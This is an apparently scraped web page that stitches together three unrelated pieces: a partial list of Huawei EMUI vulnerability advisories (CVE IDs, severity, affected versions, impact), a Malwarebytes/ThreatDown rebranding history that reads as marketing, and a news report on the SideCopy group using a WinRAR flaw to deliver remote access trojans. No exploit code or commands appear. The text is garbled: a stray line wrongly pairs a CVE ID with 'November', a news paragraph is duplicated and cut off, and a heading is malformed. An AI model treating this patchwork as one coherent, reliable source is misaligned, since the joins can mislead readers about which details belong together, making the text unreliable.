Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may cause process exceptions.

CVE-2023-46768: Multi-thread vulnerability in the idmap module

Severity: High

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may cause features to perform abnormally.

CVE-2023-46769: Use-After-Free (UAF) vulnerability in the dubai module

Severity: High

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2023-46770: Out-of-bounds vulnerability in the sensor module

Severity: High

Affected versions: EMUI 13.0.0, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause mistouch prevention errors on users' mobile phones.

CVE-2023-46771: Security vulnerability in the face unlock module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect service confidentiality.

CVE-2023-46772: Vulnerability of parameters being out of the value range in the QMI service module

Severity: Medium

Affected versions: EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause errors in reading file data.

CVE-2023-46774: Vulnerability of uncaught exceptions in the NFC module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability can affect NFC availability.

CVE-2023-5801: Vulnerability of identity verification being bypassed in the face unlock module

Severity: Critical

Affected versions: EMUI 13.0.0, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality.

CVE-2023-5801: November

With the release of ThreatDown, let's take a look at Malwarebytes' 15-year legacy and what's next.

November marks a significant shift in our legacy. After 15 years as Malwarebytes, we are proud to introduce our rebranded identity, ThreatDown powered by Malwarebytes.

Building off Malwarebytes’ initial recognition for removing every trace of viruses that others missed, ThreatDown powered by Malwarebytes combines award-winning technologies that cover all stages of an attack, with managed services for teams with limited resources.

To say it’s been quite a journey to this point would be an understatement. From our beginnings as a remediation consumer tool to becoming a titan in business cyber protection, let’s walk through where we’ve come and where we’re headed.

**Anti-Malware Small Business Edition (2008 – 2012)**

Malwarebytes for Business began its journey in the late 2000s, offering corporate licensing for its consumer anti-malware product. By 2012, our focus intensified as we launched the Anti-Malware Small Business Edition, introducing advanced features to meet the specific demands of businesses.

**Malwarebytes Enterprise Edition (September 2012 – 2016)**

The introduction of Malwarebytes Enterprise Edition (MEE) in late 2012 solidified our position in the enterprise market. Tailored for businesses, governments, and educational institutions, MEE provided comprehensive threat protection and malware remediation. As the demand for our expertise grew, esteemed institutions such as The University of Alabama and NextGen Healthcare became part of our clientele.

**Malwarebytes Endpoint Security (June 2014 – 2016)**

2014 saw the birth of the Anti-Malware Remediation Tool, a streamlined malware solution for businesses. Shortly after, Malwarebytes Endpoint Security was launched, merging multiple essential tools into one comprehensive package.

**Nebula (2017 – 2018)**

Transitioning into cloud security management, 2017 introduced Nebula 1.0, our cloud-based console. This platform brought together our machine learning-backed Malwarebytes Incident Response and Endpoint Protection products.

**OneView (2019)**

2019 heralded the debut of OneView, a multi-tenant console tailored for Managed Service Providers (MSPs). With OneView, MSPs could efficiently manage multiple clients’ security needs from a unified platform.

**Comprehensive Endpoint Detection and Response Offerings (2020 – 2021)**

Throughout 2020 and 2021, we fortified our EDR capabilities, including extensions to support Windows servers. With features such as Flight Recorder Search, Threat Hunting Alerts, and Brute Force Protection, we further strengthened our protective measures against cyber threats.

**Managed Detection and Response (2022)**

Last year, we delved into a multitude of new services and tools, including Device Control, Vulnerability Assessment, Patch Management Modules, and many more. Our crowning achievement was the introduction of Malwarebytes Managed Detection and Response (MDR) service, providing 24×7 monitoring and investigations for resource constrained IT teams.

**Securing The Against the Next Generation of Threats (2023 and beyond)**

2023 marked our foray into Mobile Protection for iOS, Android, and Chromebook platforms, helping organizations crush mobile threats on iOS, Android, and ChromeOS. The introduction of an Application Blocking Module gave administrators even greater control over app installations on devices.

Further, with the release of Malwarebytes Security Advisor, we transformed the Nebula customer experience to enable organizations to visualize and improve their security posture in just a few minutes. We also released Malwarebytes Managed Threat Hunting (MTH), a 24/7 service that proactively identifies and then alerts EDR customers to potential threats before an active attack begins.

**Into The Future With ThreatDown powered by Malwarebytes**

Originating from Malwarebytes’ 15-year legacy in combating daily malware threats, ThreatDown powered by Malwarebytes has evolved in tandem with the ever-changing threat landscape.

ThreatDown’s mission for businesses is straightforward: neutralize threats promptly and efficiently, without the need for extensive IT teams, prolonged setup times, or substantial budgets. We combine the technologies and services that resource constrained IT teams need into four streamlined, cost-effective bundles that take down threats, take down complexity and take down costs:

*   **ThreatDown Core Bundle**: Basic malware protection and threat surface reduction. A simple yet superior solution integrating award-winning endpoint protection technologies.
*   **ThreatDown Advanced Bundle**: Everything included in core plus Automated Threat Hunting and Ransomware Rollback. Tailored for smaller security teams with limited resources.
*   **ThreatDown Elite Bundle**: Everything in Advanced plus 24/7 expert monitoring and response by Malwarebytes MDR analysts. Purpose-built for organizations with small (to non-existent) security teams that lack the resources to address all security alerts.
*   **ThreatDown Ultimate Bundle**: Everything in Elite plus protection from categories of malicious websites. Perfect for teams looking for a SOC-in-a-box, a one-and-done shortcut to cybersecurity done right.

In short, with ThreatDown, the mission is clear: To take down threats to businesses and reduce attack surfaces immediately, without the need for an IT army or big budgets. Together, we can overpower threats—and empower IT.

Visit www.threatdown.com to learn more.

 ThreatDown powered by Malwarebytes: A 15 Year Journey 

The Pakistan-linked threat actor known as SideCopy has been observed leveraging the recent WinRAR security vulnerability in its attacks targeting Indian government entities to deliver various remote access trojans such as AllaKore RAT, Ares RAT, and DRat.
Enterprise security firm SEQRITE described the campaign as multi-platform, with the attacks also designed to infiltrate Linux systems with a

The Pakistan-linked threat actor known as **SideCopy** has been observed leveraging the recent WinRAR security vulnerability in its attacks targeting Indian government entities to deliver various remote access trojans such as AllaKore RAT, Ares RAT, and DRat.

Enterprise security firm SEQRITE described the campaign as multi-platform, with the attacks also designed to infiltrate Linux systems with a compatible version of Ares RAT.

SideCopy, active since at least 2019, is known for its attacks on Indian and Afghanistan entities. It's suspected to be a sub-group of the Transparent Tribe (ak APT36).

"Both SideCopy and APT36 share infrastructure and code to aggressively target India," SEQRITE researcher Sathwik Ram Prakki said in a Monday report.

Earlier this May, the group was linked to a phishing campaign that took advantage of lures related to India's Defence Research and Development Organization (DRDO) to deliver information-stealing malware.

Since then, SideCopy has also been implicated in a set of phishing attacks targeting the Indian defense sector with ZIP archive attachments to propagate Action RAT and a new .NET-based trojan that supports 18 different commands.

The new phishing campaigns detected by SEQRITE entail two different attack chains, each targeting Linux and Windows operating systems.

The former revolves around a Golang-based ELF binary that paves the way for a Linux version of Ares RAT that's capable of enumerating files, taking screenshots, and file downloading and uploading, among others.

The second campaign, on the other hand, entails the exploitation of CVE-2023-38831, a security flaw in the WinRAR archiving tool, to trigger the execution of malicious code, leading to the deployment of AllaKore RAT, Ares RAT, and two new trojans called DRat and Key RAT.

"\[AllaKore RAT\] has the functionality to steal system information, keylogging, take screenshots, upload & download files, and take the remote access of the victim machine to send commands and upload stolen data to the C2," Ram Prakki said.

DRat is capable of parsing as many as 13 commands from the C2 server to gather system data, download and execute additional payloads, and perform other file operations.

The targeting of Linux is not coincidental and is likely motivated by India's decision to replace Microsoft Windows with a Linux flavor called Maya OS across government and defense sectors.

"Expanding its arsenal with zero-day vulnerability, SideCopy consistently targets Indian defense organizations with various remote access trojans," Ram Prakki said.

"APT36 is expanding its Linux arsenal constantly, where sharing its Linux stagers with SideCopy is observed to deploy an open-source Python RAT called Ares."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows